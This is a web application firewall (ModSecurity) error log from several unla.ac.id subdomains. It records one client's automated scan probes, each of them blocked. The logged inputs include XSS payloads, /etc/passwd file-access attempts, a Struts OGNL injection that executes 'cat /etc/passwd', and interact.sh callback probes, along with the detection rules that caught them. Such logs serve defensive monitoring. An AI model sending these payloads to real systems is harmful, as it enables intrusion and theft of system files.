[Tue Aug 29 11:49:09.478740 2023] [:error] [pid 2449] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:USERNAME: <img src=x onerror=\\x22confirm(document.domain)\\x22>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/siteminderagent/forms/smaceauth.fcc"] [unique_id "ZO14xcCo-f0AAAmRU9QAAAAh"]
[Tue Aug 29 11:49:09.496676 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:USERNAME: <img src=x onerror=\\x22confirm(document.domain)\\x22>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/siteminderagent/forms/smaceauth.fcc"] [unique_id "ZO14xcCo-f0AAAfWN@YAAAAL"]
[Tue Aug 29 11:49:09.506560 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:query: {\\x22tax_query\\x22:{\\x220\\x22:{\\x22field\\x22:\\x22term_taxonomy_id\\x22,\\x22terms\\x22:[\\x22\\x22]}}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14xcCo-f0AAAkGCagAAAAE"]
[Tue Aug 29 11:49:10.379709 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:query: {\\x22tax_query\\x22:{\\x220\\x22:{\\x22field\\x22:\\x22term_taxonomy_id\\x22,\\x22terms\\x22:[\\x22\\x22]}}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14xsCo-f0AAAjYrGsAAAAK"]
[Tue Aug 29 11:49:10.387037 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:query: {\\x22tax_query\\x22:{\\x220\\x22:{\\x22field\\x22:\\x22term_taxonomy_id\\x22,\\x22terms\\x22:[\\x22\\x22]}}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14xsCo-f0AAAjy570AAAAG"]
[Tue Aug 29 11:49:10.394955 2023] [:error] [pid 2408] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:USERNAME: <img src=x onerror=\\x22confirm(document.domain)\\x22>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/siteminderagent/forms/smpwservices.fcc"] [unique_id "ZO14xsCo-f0AAAlo01oAAAAJ"]
[Tue Aug 29 11:49:10.408647 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:query: {\\x22tax_query\\x22:{\\x220\\x22:{\\x22field\\x22:\\x22term_taxonomy_id\\x22,\\x22terms\\x22:[\\x22\\x22]}}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14xsCo-f0AAAjYrGwAAAAK"]
[Tue Aug 29 11:49:10.474803 2023] [:error] [pid 2357] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:query: {\\x22tax_query\\x22:{\\x220\\x22:{\\x22field\\x22:\\x22term_taxonomy_id\\x22,\\x22terms\\x22:[\\x22\\x22]}}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14xsCo-f0AAAk1w98AAAAY"]
[Tue Aug 29 11:49:11.644474 2023] [:error] [pid 2449] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:USERNAME: <img src=x onerror=\\x22confirm(document.domain)\\x22>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/siteminderagent/forms/smaceauth.fcc"] [unique_id "ZO14x8Co-f0AAAmRU9gAAAAh"]
[Tue Aug 29 11:49:15.397315 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:id: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/eam/vib"] [unique_id "ZO14y8Co-f0AAAjYrHUAAAAK"]
[Tue Aug 29 11:49:15.399470 2023] [:error] [pid 2443] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:id: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/eam/vib"] [unique_id "ZO14y8Co-f0AAAmLPQoAAAAN"]
[Tue Aug 29 11:49:15.400277 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:id: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/eam/vib"] [unique_id "ZO14y8Co-f0AAAjy58cAAAAG"]
[Tue Aug 29 11:49:15.404469 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:id: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/eam/vib"] [unique_id "ZO14y8Co-f0AAAkyyBEAAAAW"]
[Tue Aug 29 11:49:15.409678 2023] [:error] [pid 2404] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:id: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/eam/vib"] [unique_id "ZO14y8Co-f0AAAlkwj4AAAAO"]
[Tue Aug 29 11:49:16.382137 2023] [:error] [pid 2446] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:id: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/eam/vib"] [unique_id "ZO14zMCo-f0AAAmOBaAAAAAU"]
[Tue Aug 29 11:51:05.184843 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:settingsform[newpassword1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: ' onclick= found within ARGS:settingsform[newpassword1]: pdteam' onclick='alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/install.php"] [unique_id "ZO15OcCo-f0AAAlIBdkAAAAn"]
[Tue Aug 29 11:51:05.187925 2023] [:error] [pid 2343] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:type: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/cliniccases/lib/php/data/messages_load.php"] [unique_id "ZO15OcCo-f0AAAknELMAAAAB"]
[Tue Aug 29 11:51:05.189638 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:settingsform[newpassword1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:settingsform[newpassword1]: pdteam' onclick='alert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/install.php"] [unique_id "ZO15OcCo-f0AAAfWOAsAAAAL"]
[Tue Aug 29 11:51:05.248201 2023] [:error] [pid 2424] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:expression. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22) ,# found within ARGS:expression: (#_memberAccess[\\x22allowStaticMethodAccess\\x22]=true,#foo=new java.lang.Boolean(\\x22false\\x22) ,#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('cat /etc/passwd').getInputStream()))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/devmode.action"] [unique_id "ZO15OcCo-f0AAAl4sWQAAAAf"]
[Tue Aug 29 11:51:05.254798 2023] [:error] [pid 2343] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/exchweb/bin/redir.asp"] [unique_id "ZO15OcCo-f0AAAknELUAAAAB"]
[Tue Aug 29 11:51:05.277535 2023] [:error] [pid 2343] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onerror= found within ARGS:username: <img/src/onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/cas/v1/tickets/"] [unique_id "ZO15OcCo-f0AAAknELYAAAAB"]
[Tue Aug 29 11:51:05.330446 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:settingsform[newpassword1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: ' onclick= found within ARGS:settingsform[newpassword1]: pdteam' onclick='alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/install.php"] [unique_id "ZO15OcCo-f0AAAfWOA4AAAAL"]
[Tue Aug 29 11:51:05.334525 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:type: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/cliniccases/lib/php/data/messages_load.php"] [unique_id "ZO15OcCo-f0AAAlIBdwAAAAn"]
[Tue Aug 29 11:51:05.340312 2023] [:error] [pid 2343] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:settingsform[newpassword1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: ' onclick= found within ARGS:settingsform[newpassword1]: pdteam' onclick='alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/install.php"] [unique_id "ZO15OcCo-f0AAAknELcAAAAB"]
[Tue Aug 29 11:51:05.354492 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:type: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/cliniccases/lib/php/data/messages_load.php"] [unique_id "ZO15OcCo-f0AAAlIBd0AAAAn"]
[Tue Aug 29 11:51:05.355563 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:settingsform[newpassword1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:settingsform[newpassword1]: pdteam' onclick='alert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/install.php"] [unique_id "ZO15OcCo-f0AAAhoHN4AAAAl"]
[Tue Aug 29 11:51:05.367901 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:type: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cliniccases/lib/php/data/messages_load.php"] [unique_id "ZO15OcCo-f0AAAfWOBAAAAAL"]
[Tue Aug 29 11:51:05.416903 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/exchweb/bin/redir.asp"] [unique_id "ZO15OcCo-f0AAAhoHOEAAAAl"]
[Tue Aug 29 11:51:05.432962 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/exchweb/bin/redir.asp"] [unique_id "ZO15OcCo-f0AAAlIBeEAAAAn"]
